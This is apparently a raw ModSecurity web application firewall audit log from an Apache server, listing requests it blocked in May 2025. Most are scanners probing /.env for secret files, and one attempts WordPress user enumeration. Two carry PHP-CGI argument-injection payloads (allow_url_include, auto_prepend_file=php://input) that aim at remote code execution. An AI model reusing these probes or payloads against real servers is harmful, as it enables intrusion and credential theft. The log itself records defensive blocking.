Content-Type: text/html; charset=iso-8859-1
--93fab063-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746131063357376 1090 (- - -)
Stopwatch2: 1746131063357376 1090; combined=538, p1=500, p2=0, p3=0, p4=0, p5=37, sr=166, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--93fab063-Z--
--61e3ff1d-A--
[02/May/2025:04:21:45 +0700] aBPl6RXwRgnphTBdhpRSMgAAAJc 103.236.140.4 59990 103.236.140.4 8181
--61e3ff1d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 137.184.165.148
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 137.184.165.148
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--61e3ff1d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--61e3ff1d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746134505426871 9431 (- - -)
Stopwatch2: 1746134505426871 9431; combined=17754, p1=217, p2=0, p3=0, p4=0, p5=8788, sr=55, sw=1, l=0, gc=8748
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--61e3ff1d-Z--
--0a13e060-A--
[02/May/2025:05:06:57 +0700] aBPwgfNNWdC6CAybkqP62QAAANA 103.236.140.4 42890 103.236.140.4 8181
--0a13e060-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.73.101
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.73.101
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/80.0.262003652 Mobile/16F203 Safari/604.1
Accept-Charset: utf-8
--0a13e060-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0a13e060-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746137217853930 859 (- - -)
Stopwatch2: 1746137217853930 859; combined=387, p1=349, p2=0, p3=0, p4=0, p5=38, sr=138, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0a13e060-Z--
--13cfd503-A--
[02/May/2025:05:08:02 +0700] aBPwwqGyUvHV-cebb64ixQAAAEQ 103.236.140.4 43140 103.236.140.4 8181
--13cfd503-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.73.101
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.73.101
X-Forwarded-Proto: http
Connection: close
User-Agent: BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123
Accept-Charset: utf-8
--13cfd503-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--13cfd503-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746137282714874 802 (- - -)
Stopwatch2: 1746137282714874 802; combined=295, p1=259, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--13cfd503-Z--
--11b3e27f-A--
[02/May/2025:07:19:00 +0700] aBQPdBXwRgnphTBdhpRb4QAAAIA 103.236.140.4 45444 103.236.140.4 8181
--11b3e27f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.70.87
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.70.87
X-Forwarded-Proto: https
Connection: close
User-Agent: iTunes/9.0.2 (Windows; N)
Accept-Charset: utf-8
--11b3e27f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--11b3e27f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746145140067881 823 (- - -)
Stopwatch2: 1746145140067881 823; combined=331, p1=292, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--11b3e27f-Z--
--9809a253-A--
[02/May/2025:07:23:47 +0700] aBQQk6GyUvHV-cebb64qLwAAAEI 103.236.140.4 46554 103.236.140.4 8181
--9809a253-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.211.191.76
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.211.191.76
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba
Accept-Charset: utf-8
--9809a253-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9809a253-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746145427898004 777 (- - -)
Stopwatch2: 1746145427898004 777; combined=343, p1=305, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9809a253-Z--
--914cae2c-A--
[02/May/2025:07:24:12 +0700] aBQQrPNNWdC6CAybkqMDvQAAAMM 103.236.140.4 46650 103.236.140.4 8181
--914cae2c-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://smkn22-jkt.sch.id
Host: smkn22-jkt.sch.id
X-Real-IP: 156.239.214.224
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.239.214.224
X-Forwarded-Proto: https
Connection: close
Origin: https://smkn22-jkt.sch.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
--914cae2c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--914cae2c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746145452261576 2624 (- - -)
Stopwatch2: 1746145452261576 2624; combined=1371, p1=438, p2=900, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--914cae2c-Z--
--58c29a69-A--
[02/May/2025:09:23:55 +0700] aBQsu_NNWdC6CAybkqMFbAAAANQ 103.236.140.4 50742 103.236.140.4 8181
--58c29a69-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 137.184.165.148
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 137.184.165.148
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--58c29a69-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--58c29a69-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746152635460868 775 (- - -)
Stopwatch2: 1746152635460868 775; combined=309, p1=269, p2=0, p3=0, p4=0, p5=39, sr=75, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--58c29a69-Z--
--f379157c-A--
[02/May/2025:11:26:37 +0700] aBRJfcwZl97WzW7hutNP0gAAAAA 103.236.140.4 52186 103.236.140.4 8181
--f379157c-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 157.245.36.108
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 157.245.36.108
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--f379157c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f379157c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746159997104216 856 (- - -)
Stopwatch2: 1746159997104216 856; combined=293, p1=260, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f379157c-Z--
--5915c032-A--
[02/May/2025:11:53:33 +0700] aBRPzaGyUvHV-cebb64sAQAAAEE 103.236.140.4 52628 103.236.140.4 8181
--5915c032-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 34.34.185.61
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 34.34.185.61
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--5915c032-C--
--5915c032-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5915c032-E--
--5915c032-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746161613958851 5004 (- - -)
Stopwatch2: 1746161613958851 5004; combined=3516, p1=484, p2=3001, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5915c032-Z--
--dcdf094f-A--
[02/May/2025:12:21:46 +0700] aBRWaswZl97WzW7hutNQCwAAABI 103.236.140.4 53034 103.236.140.4 8181
--dcdf094f-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 188.166.108.93
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 188.166.108.93
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--dcdf094f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dcdf094f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746163306035375 686 (- - -)
Stopwatch2: 1746163306035375 686; combined=248, p1=215, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dcdf094f-Z--
--e378a714-A--
[02/May/2025:12:28:34 +0700] aBRYAqGyUvHV-cebb64sMgAAAFA 103.236.140.4 53124 103.236.140.4 8181
--e378a714-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 167.71.175.236
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 167.71.175.236
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--e378a714-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e378a714-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746163714336969 769 (- - -)
Stopwatch2: 1746163714336969 769; combined=293, p1=260, p2=0, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e378a714-Z--
--025ab419-A--
[02/May/2025:13:19:12 +0700] aBRj4BXwRgnphTBdhpReYwAAAIc 103.236.140.4 53778 103.236.140.4 8181
--025ab419-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 167.71.81.114
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 167.71.81.114
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--025ab419-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--025ab419-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746166752750360 827 (- - -)
Stopwatch2: 1746166752750360 827; combined=353, p1=316, p2=0, p3=0, p4=0, p5=36, sr=96, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--025ab419-Z--
--1006dc01-A--
[02/May/2025:14:04:00 +0700] aBRuYPNNWdC6CAybkqMG-wAAAMc 103.236.140.4 54162 103.236.140.4 8181
--1006dc01-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 68.183.9.16
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 68.183.9.16
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--1006dc01-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1006dc01-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746169440522541 793 (- - -)
Stopwatch2: 1746169440522541 793; combined=316, p1=280, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1006dc01-Z--
--15265971-A--
[02/May/2025:15:31:48 +0700] aBSC9MwZl97WzW7hutNUGAAAAAI 103.236.140.4 36650 103.236.140.4 8181
--15265971-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 167.71.81.114
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 167.71.81.114
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--15265971-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--15265971-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746174708326227 747 (- - -)
Stopwatch2: 1746174708326227 747; combined=265, p1=237, p2=0, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--15265971-Z--
--0bcd6d3a-A--
[02/May/2025:15:56:31 +0700] aBSIv_NNWdC6CAybkqMJngAAAMQ 103.236.140.4 37322 103.236.140.4 8181
--0bcd6d3a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 112.78.36.210
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 112.78.36.210
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--0bcd6d3a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0bcd6d3a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746176191107136 926 (- - -)
Stopwatch2: 1746176191107136 926; combined=450, p1=411, p2=0, p3=0, p4=0, p5=38, sr=132, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0bcd6d3a-Z--
--aa3bfa08-A--
[02/May/2025:15:56:33 +0700] aBSIwaGyUvHV-cebb64vKAAAAFM 103.236.140.4 37326 103.236.140.4 8181
--aa3bfa08-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 112.78.36.210
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 112.78.36.210
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--aa3bfa08-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--aa3bfa08-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746176193432174 700 (- - -)
Stopwatch2: 1746176193432174 700; combined=300, p1=265, p2=0, p3=0, p4=0, p5=34, sr=68, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--aa3bfa08-Z--
--73f8f256-A--
[02/May/2025:16:11:39 +0700] aBSMSxXwRgnphTBdhpRipQAAAIQ 103.236.140.4 37514 103.236.140.4 8181
--73f8f256-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.137.162
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.137.162
X-Forwarded-Proto: http
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
--73f8f256-C--
--73f8f256-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--73f8f256-E--
--73f8f256-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746177099953944 4365 (- - -)
Stopwatch2: 1746177099953944 4365; combined=2819, p1=479, p2=2298, p3=0, p4=0, p5=41, sr=73, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--73f8f256-Z--
--98b85937-A--
[02/May/2025:17:04:18 +0700] aBSYoswZl97WzW7hutNUygAAABQ 103.236.140.4 37954 103.236.140.4 8181
--98b85937-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 143.244.161.16
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 143.244.161.16
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--98b85937-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--98b85937-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746180258536437 830 (- - -)
Stopwatch2: 1746180258536437 830; combined=344, p1=302, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--98b85937-Z--
--5936b573-A--
[02/May/2025:17:14:34 +0700] aBSbCswZl97WzW7hutNU1wAAABQ 103.236.140.4 38052 103.236.140.4 8181
--5936b573-B--
GET /.env HTTP/1.0
Host: bolang.twilightparadox.com
X-Real-IP: 64.23.218.208
X-Forwarded-Host: bolang.twilightparadox.com
X-Forwarded-Server: bolang.twilightparadox.com
X-Forwarded-For: 64.23.218.208
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--5936b573-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5936b573-H--
